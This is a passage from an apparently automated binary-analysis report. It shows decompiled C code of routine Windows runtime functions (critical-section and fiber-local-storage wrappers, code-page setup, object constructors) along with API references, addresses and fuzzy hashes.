                                            • Instruction Fuzzy Hash: 3E01D736540209FBCF229F91DD05EAE3FA6FB08760F014564FE1526161CA729971EB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00C59C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0xc6d668; // 0x13bcba52
				_v8 = _t8 ^ _t21;
				_t10 = E00C59990(0x14, "InitializeCriticalSectionEx", 0xc6607c, 0xc66084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xc62260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E00C4E203(_t11, _v8 ^ _t21);
			}









                                            0x00c59c07
                                            0x00c59c08
                                            0x00c59c0f
                                            0x00c59c24
                                            0x00c59c29
                                            0x00c59c30
                                            0x00c59c4d
                                            0x00c59c32
                                            0x00c59c3d
                                            0x00c59c43
                                            0x00c59c43
                                            0x00c59c61

                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C59291), ref: 00C59C4D
                                            Strings
                                            • InitializeCriticalSectionEx, xrefs: 00C59C1D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpin
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 2593887523-3084827643
                                            • Opcode ID: f0461e772d58f32c9e211ce994959d974827298c4880813e74c6cea87c587195
                                            • Instruction ID: f2357dbe1ddb40d70486404fd40211b7441edd0b7bbb81fb684c7f95e41b4f1f
                                            • Opcode Fuzzy Hash: f0461e772d58f32c9e211ce994959d974827298c4880813e74c6cea87c587195
                                            • Instruction Fuzzy Hash: 22F0B435A4120CFBCF256F51DC05EAE7FA5EB04721B014065FE1916260CAB14E50E784
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00C59AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0xc6d668; // 0x13bcba52
				_v8 = _t4 ^ _t17;
				_t6 = E00C59990(3, "FlsAlloc", 0xc66040, 0xc66048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xc62260(_a4);
					_t7 =  *_t15();
				}
				return E00C4E203(_t7, _v8 ^ _t17);
			}









                                            0x00c59aac
                                            0x00c59aad
                                            0x00c59ab4
                                            0x00c59ac9
                                            0x00c59ace
                                            0x00c59ad5
                                            0x00c59ae6
                                            0x00c59ad7
                                            0x00c59adc
                                            0x00c59ae2
                                            0x00c59ae2
                                            0x00c59afa

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Alloc
                                            • String ID: FlsAlloc
                                            • API String ID: 2773662609-671089009
                                            • Opcode ID: ff327f8d0b0e824903f6e348faf9914ddcaafd7236a45925940a9040b5b8402f
                                            • Instruction ID: ed59c0bfcc44f97aaafbed5d7605ddb33c650110f2fc3b3eab6b8419c2170464
                                            • Opcode Fuzzy Hash: ff327f8d0b0e824903f6e348faf9914ddcaafd7236a45925940a9040b5b8402f
                                            • Instruction Fuzzy Hash: 5EE02B31F45218F7C730AB629C06F6FBBA4EF45721B0104B9FC0957290DEB05E40A6D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00C5281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00C526F9(4, "FlsAlloc", 0xc64394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00C4E2DD();
				return  *_t6(_a4);
			}





                                            0x00c5282f
                                            0x00c52834
                                            0x00c5283b
                                            0x00c5284e
                                            0x00c5284e
                                            0x00c52842
                                            0x00c5284b

                                            APIs
                                            • try_get_function.LIBVCRUNTIME ref: 00C5282F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: FlsAlloc
                                            • API String ID: 2742660187-671089009
                                            • Opcode ID: 528367c9ca7f2be67417587e1e0edcb55fcb492a6322e401790512f8cad22385
                                            • Instruction ID: fac6cb0f8303158afb319d9c9e857acdce6d226b8d7491f8dee1469e8378b750
                                            • Opcode Fuzzy Hash: 528367c9ca7f2be67417587e1e0edcb55fcb492a6322e401790512f8cad22385
                                            • Instruction Fuzzy Hash: B0D05E32785728A7C93432D56C42AAEBE989B02BB2F060172FF0C653A2E9A5595062D5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5A873, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 97%
                                            			E00C5A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0xc6d668; // 0x13bcba52
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E00C5A446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xc6d828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0xc6d828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xc90854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00C5A4B9(_t96);
												goto L37;
											}
										} else {
											E00C4E920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E00C5A408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00C5A51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00C4E920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xc6d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xc6d820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E00C5A408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0xc6d82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00C5A4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E00C4E203(_t60, _v8 ^ _t97);
			}































                                            0x00c5a87b
                                            0x00c5a882
                                            0x00c5a88a
                                            0x00c5a892
                                            0x00c5a897
                                            0x00c5a8a8
                                            0x00c5a8a8
                                            0x00c5a8aa
                                            0x00c5a8ac
                                            0x00c5a8ae
                                            0x00c5a8b1
                                            0x00c5a8b1
                                            0x00c5a8b7
                                            0x00000000
                                            0x00000000
                                            0x00c5a8bd
                                            0x00c5a8be
                                            0x00c5a8c1
                                            0x00c5a8c4
                                            0x00c5a8c9
                                            0x00000000
                                            0x00c5a8cb
                                            0x00c5a8cb
                                            0x00c5a8d1
                                            0x00c5a99f
                                            0x00c5a99f
                                            0x00c5a8d7
                                            0x00c5a8d7
                                            0x00c5a8dd
                                            0x00000000
                                            0x00c5a8e3
                                            0x00c5a8e7
                                            0x00c5a8ed
                                            0x00c5a8ef
                                            0x00000000
                                            0x00c5a8f5
                                            0x00c5a8fa
                                            0x00c5a900
                                            0x00c5a902
                                            0x00c5a98c
                                            0x00c5a992
                                            0x00000000
                                            0x00c5a994
                                            0x00c5a995
                                            0x00000000
                                            0x00c5a995
                                            0x00c5a908
                                            0x00c5a912
                                            0x00c5a917
                                            0x00c5a91f
                                            0x00c5a925
                                            0x00c5a926
                                            0x00c5a929
                                            0x00c5a97c
                                            0x00c5a92b
                                            0x00c5a92b
                                            0x00c5a92f
                                            0x00c5a932
                                            0x00c5a934
                                            0x00c5a934
                                            0x00c5a937
                                            0x00c5a939
                                            0x00000000
                                            0x00000000
                                            0x00c5a93b
                                            0x00c5a93e
                                            0x00c5a949
                                            0x00c5a949
                                            0x00c5a94b
                                            0x00000000
                                            0x00000000
                                            0x00c5a943
                                            0x00c5a948
                                            0x00c5a948
                                            0x00c5a948
                                            0x00c5a94d
                                            0x00c5a950
                                            0x00c5a953
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5a953
                                            0x00c5a934
                                            0x00c5a955
                                            0x00c5a955
                                            0x00c5a958
                                            0x00c5a95d
                                            0x00c5a95d
                                            0x00c5a960
                                            0x00c5a961
                                            0x00c5a961
                                            0x00c5a961
                                            0x00c5a971
                                            0x00c5a977
                                            0x00c5a977
                                            0x00c5a981
                                            0x00c5a984
                                            0x00c5a985
                                            0x00c5a986
                                            0x00c5aa4a
                                            0x00c5aa4b
                                            0x00c5aa50
                                            0x00c5aa51
                                            0x00c5aa51
                                            0x00c5aa51
                                            0x00c5a902
                                            0x00c5a8ef
                                            0x00c5a8dd
                                            0x00c5a8d1
                                            0x00000000
                                            0x00c5aa53
                                            0x00c5a9b1
                                            0x00c5a9b9
                                            0x00c5a9b9
                                            0x00c5a9bd
                                            0x00c5a9c0
                                            0x00c5a9c6
                                            0x00c5a9c9
                                            0x00c5a9c9
                                            0x00c5a9cc
                                            0x00c5a9ce
                                            0x00c5a9d0
                                            0x00c5a9d0
                                            0x00c5a9d3
                                            0x00c5a9d5
                                            0x00000000
                                            0x00000000
                                            0x00c5a9d7
                                            0x00c5a9da
                                            0x00c5a9f6
                                            0x00c5a9f6
                                            0x00c5a9f8
                                            0x00000000
                                            0x00000000
                                            0x00c5a9df
                                            0x00c5a9e5
                                            0x00c5a9e7
                                            0x00c5a9ed
                                            0x00c5a9f1
                                            0x00c5a9f1
                                            0x00c5a9f2
                                            0x00000000
                                            0x00c5a9f2
                                            0x00000000
                                            0x00c5a9e5
                                            0x00c5a9fa
                                            0x00c5a9fd
                                            0x00c5aa00
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5aa00
                                            0x00c5aa02
                                            0x00c5aa02
                                            0x00c5aa05
                                            0x00c5aa06
                                            0x00c5aa09
                                            0x00c5aa0c
                                            0x00c5aa0c
                                            0x00c5aa12
                                            0x00c5aa15
                                            0x00c5aa24
                                            0x00c5aa2d
                                            0x00c5aa32
                                            0x00c5aa38
                                            0x00c5aa39
                                            0x00c5aa39
                                            0x00c5aa3c
                                            0x00c5aa3f
                                            0x00c5aa42
                                            0x00c5aa45
                                            0x00c5aa45
                                            0x00c5aa45
                                            0x00000000
                                            0x00c5a899
                                            0x00c5a89a
                                            0x00c5a8a0
                                            0x00c5a8a0
                                            0x00c5aa54
                                            0x00c5aa63

                                            APIs
                                              • Part of subcall function 00C5A446: GetOEMCP.KERNEL32(00000000,?,?,00C5A6CF,?), ref: 00C5A471
                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C5A714,?,00000000), ref: 00C5A8E7
                                            • GetCPInfo.KERNEL32(00000000,00C5A714,?,?,?,00C5A714,?,00000000), ref: 00C5A8FA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CodeInfoPageValid
                                            • String ID:
                                            • API String ID: 546120528-0
                                            • Opcode ID: fd40b9b748d612d12aaba76b6aa2b7f72e0219ef4e0208db999da82f6ef80875
                                            • Instruction ID: 640933e9e5d1b5fcb4b916a902904fb3737c93b23d23c40b91a80a63cab58feb
                                            • Opcode Fuzzy Hash: fd40b9b748d612d12aaba76b6aa2b7f72e0219ef4e0208db999da82f6ef80875
                                            • Instruction Fuzzy Hash: F1519978A002555FDB20CF33C4456BBBBE5EF05311F14422ED8A68B182D73496CADB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C31382, Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00C31382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00C4D870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00C3943C(_t78);
				 *_t89 = 0xc622e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00C35E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00C3C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00C3151B();
				_t62 = E00C3151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00C4D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00C3AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00C4E920(_t87, _t89 + 0x2208, 0, 0x40);
				E00C4E920(_t87, _t89 + 0x2248, 0, 0x34);
				E00C4E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















                                            0x00c31382
                                            0x00c31382
                                            0x00c31382
                                            0x00c31382
                                            0x00c31382
                                            0x00c31387
                                            0x00c3138a
                                            0x00c3138c
                                            0x00c3138f
                                            0x00c31396
                                            0x00c313a2
                                            0x00c313a5
                                            0x00c313b0
                                            0x00c313b4
                                            0x00c313bf
                                            0x00c313c5
                                            0x00c313cb
                                            0x00c313d6
                                            0x00c313de
                                            0x00c313e2
                                            0x00c313e5
                                            0x00c313eb
                                            0x00c313f1
                                            0x00c313f3
                                            0x00c31418
                                            0x00c313f5
                                            0x00c313fa
                                            0x00c31400
                                            0x00c31403
                                            0x00c31409
                                            0x00c31414
                                            0x00c3140b
                                            0x00c3140d
                                            0x00c3140d
                                            0x00c31409
                                            0x00c3141b
                                            0x00c31427
                                            0x00c3142e
                                            0x00c31435
                                            0x00c3143e
                                            0x00c31449
                                            0x00c31453
                                            0x00c31459
                                            0x00c3145f
                                            0x00c31465
                                            0x00c3146b
                                            0x00c31471
                                            0x00c31477
                                            0x00c3147e
                                            0x00c31484
                                            0x00c3148a
                                            0x00c31490
                                            0x00c31496
                                            0x00c3149c
                                            0x00c314ab
                                            0x00c314ba
                                            0x00c314c5
                                            0x00c314cd
                                            0x00c314d3
                                            0x00c314d9
                                            0x00c314df
                                            0x00c314e5
                                            0x00c314eb
                                            0x00c314f1
                                            0x00c314fa
                                            0x00c31500
                                            0x00c31506
                                            0x00c3150e
                                            0x00c31518

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C31382
                                              • Part of subcall function 00C35E99: __EH_prolog.LIBCMT ref: 00C35E9E
                                              • Part of subcall function 00C3C4CA: __EH_prolog.LIBCMT ref: 00C3C4CF
                                              • Part of subcall function 00C3C4CA: new.LIBCMT ref: 00C3C512
                                              • Part of subcall function 00C3C4CA: new.LIBCMT ref: 00C3C536
                                            • new.LIBCMT ref: 00C313FA
                                              • Part of subcall function 00C3AD1B: __EH_prolog.LIBCMT ref: 00C3AD20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: 1104df1332b6fcf5f31b981e51f176f87f5d3be8a61a4c5cc0261cd8358679f3
                                            • Instruction ID: 9d500d1ddeae3bfc06b7b07fd1ccb31bc3adb0e2dbc89ccdc9e9d2e682e60a57
                                            • Opcode Fuzzy Hash: 1104df1332b6fcf5f31b981e51f176f87f5d3be8a61a4c5cc0261cd8358679f3
                                            • Instruction Fuzzy Hash: A04136B0905B409ED724DF7984859E6FBF5FF28310F544A2ED5EE83282CB326554CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3137D, Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00C3137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00C4D870(E00C61157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00C3943C(_t78);
				 *_t89 = 0xc622e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00C35E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00C3C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00C3151B();
				_t62 = E00C3151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00C4D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00C3AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00C4E920(_t87, _t89 + 0x2208, 0, 0x40);
				E00C4E920(_t87, _t89 + 0x2248, 0, 0x34);
				E00C4E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














                                            0x00c3137d
                                            0x00c3137d
                                            0x00c3137d
                                            0x00c3137d
                                            0x00c31382
                                            0x00c31387
                                            0x00c3138a
                                            0x00c3138c
                                            0x00c3138f
                                            0x00c31396
                                            0x00c313a2
                                            0x00c313a5
                                            0x00c313b0
                                            0x00c313b4
                                            0x00c313bf
                                            0x00c313c5
                                            0x00c313cb
                                            0x00c313d6
                                            0x00c313de
